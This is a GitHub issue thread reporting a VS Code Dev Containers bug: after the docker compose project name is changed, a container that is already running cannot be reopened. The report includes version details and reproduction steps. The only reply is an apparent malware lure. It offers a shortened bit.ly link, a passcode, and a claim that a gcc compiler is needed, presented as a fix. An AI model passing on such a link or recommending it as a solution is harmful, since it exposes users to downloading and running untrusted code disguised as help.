### ISSUE TITLE
changing docker compose project name breaks reopening of a container if it is already running

### ISSUE THREAD

**Issue by akosyakov** [microsoft/vscode-remote-release#10226]
Version: 1.92.2
Commit: fee1edb8d6d72a0ddff41e5f71a671c23ed924b9
Date: 2024-08-14T17:29:30.058Z
Electron: 30.1.2
ElectronBuildId: 9870757
Chromium: 124.0.6367.243
Node.js: 20.14.0
V8: 12.4.254.20-electron.0
OS: Darwin arm64 23.6.0

- Logs:

Steps to Reproduce:

1. Start a container with devcontainer/cli for the docker compose project
2. Change devcontainer configuration to use different docker compose name
3. Reload the devcontainer window

Does this issue occur when you try this locally?: Yes/No
Does this issue occur when you try this locally and all extensions are disabled?: Yes/No

**Comment by yousefsk345** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler
